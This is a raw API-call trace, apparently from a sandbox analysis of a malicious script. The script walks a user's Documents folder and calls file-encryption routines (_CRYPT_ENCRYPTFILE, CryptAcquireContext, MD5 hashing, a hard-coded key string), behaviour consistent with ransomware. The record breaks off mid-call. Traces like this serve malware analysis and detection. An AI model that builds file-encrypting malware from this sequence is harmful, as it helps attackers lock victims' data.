[0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.458] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0179.458] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.459] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c95c9b0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xd9387fe0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xd9387fe0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x137f5, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="vupb0.pps", cAlternateFileName="")) returned 0x90ae18 [0179.459] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.459] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.460] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.460] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.460] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0179.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0179.460] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.460] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.460] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0179.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.461] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0179.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.462] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0179.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.462] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.462] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0179.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.463] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.463] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.463] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.463] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.463] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.463] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.463] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.463] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.508] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.508] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.508] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.508] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.508] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.508] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0179.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.508] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.508] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0179.509] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0179.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.510] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.511] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0179.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9bd3d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0179.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.513] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0179.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x8a0000, 